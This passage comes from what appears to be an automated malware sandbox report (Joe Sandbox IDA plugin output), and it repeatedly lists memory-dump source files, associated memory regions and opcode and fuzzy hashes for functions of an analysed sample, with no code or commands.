                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                              • Instruction ID: 1e02b4c8540ecdc42c114c4542195805e691962891bba747b055eb405bd248da
                              • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                              • Instruction Fuzzy Hash: FD02F571E0021A8FDB11CF79C8806AFBBE6BFDA344F15872AE855B7251D770AD428790
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                              • Instruction ID: 81864724ddacabb6a3d4fcbbfe5597953e5014b1fbb171a7c1967bffd9bc5591
                              • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                              • Instruction Fuzzy Hash: 0D02F174A083058FEB15DF29D8906A9BBE1BFA5310F148B2DE8999B352D731ECC58B41
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                              • Instruction ID: 743cc19f0c0177615394b6356f06808a011eabd38d76759cd7fe1121da2e49e4
                              • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                              • Instruction Fuzzy Hash: 48F16BB260C6914BC71D9A1484B08BD7FD2AFA9201F0E85ADFDD70F393D924DA05DB51
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                              • Instruction ID: b3a9b9afc54d7571965182cd9e0513208e15fa7b89553af74c67f86b3640dee5
                              • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                              • Instruction Fuzzy Hash: D2D17473F10A254BFB08CA99DC923EDB6E2EBD8354F19413ED916E7381D6B89D018790
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                              • Instruction ID: e26d7077998afdff6303b5997f35c7c0a30967f691993764436be08fdbead17d
                              • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                              • Instruction Fuzzy Hash: 70D1C272E007198BDF24CFA8C8947EEBBB2BF89310F149229E955A72D1D7345D46CB50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                              • Instruction ID: 56614249108c36731454ad164d0cb9493d0ba8a2c7c4078720416128a340c0b8
                              • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                              • Instruction Fuzzy Hash: 0B027974E046598FCF26CFA8C4905EDBBB6FF8D310F548159E889AB355C730AA91CB90
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                              • Instruction ID: f9b3dac290c55214abf4a8912bd55531bc48ca3b92085aeb7bffff428b05c553
                              • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                              • Instruction Fuzzy Hash: B4020275E00619DFCF15CF98C4809ADBBB6FF88350F258569E809AB351D731AA91CF90
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                              • Instruction ID: b0d1b87c90f2b11850ef867d01e1fffc178e7a22b18df322e65262da6506c00b
                              • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                              • Instruction Fuzzy Hash: BEC16A76E29B824BD713873DD842265F794BFE7290F05D72EFCE472982EB2096818204
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                              • Instruction ID: c5b42887a31d3354e4373278ed075d0cf12cbf5b063ce989c359f1d4c76d51c5
                              • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                              • Instruction Fuzzy Hash: 87D15874600B51CFE721CF29D494B67BBE0BF4A304F14892ED89A8BB91D735E846CB51
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                              • Instruction ID: 75d9c54a4f1519b8e2852fc63b63e3164a2b4baa798e5216dfc29e0baabf9593
                              • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                              • Instruction Fuzzy Hash: 72D13EB050C3808FE7148F15C0A476BBFE0BF95748F18895DE8D50B391C7BA8A49DB92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                              • Instruction ID: dc3febb3439b7414badd70538b963f384022f8018ed03a304163d516935e1beb
                              • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                              • Instruction Fuzzy Hash: 37B18F72A083515BD308CF25C89136BF7E2FFC8310F1AC93EA99997291D778D9419A82
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                              • Instruction ID: 8f4b0ddb904cec9213c1a6d1e77fce0029d97e14e4fea1ac75bd16ebde2ad189
                              • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                              • Instruction Fuzzy Hash: D4B1B372A083159FD308CF25C45076BF7E2EFC8310F1AC93EE99997291D778D9459A82
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4d6bb5d6922c0c1b91add66b8f401e3dfb83219626df7b078c989eb31b74c08e
                              • Instruction ID: 70d79bb2ef19a89d909952bf68039f5b32ec4c22586adcfac07ee82c4723fe6a
                              • Opcode Fuzzy Hash: 4d6bb5d6922c0c1b91add66b8f401e3dfb83219626df7b078c989eb31b74c08e
                              • Instruction Fuzzy Hash: BB9149F3A183049BF3086E2CDD957BABBD6EB94320F16463DD7C5837C4E93958018686
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
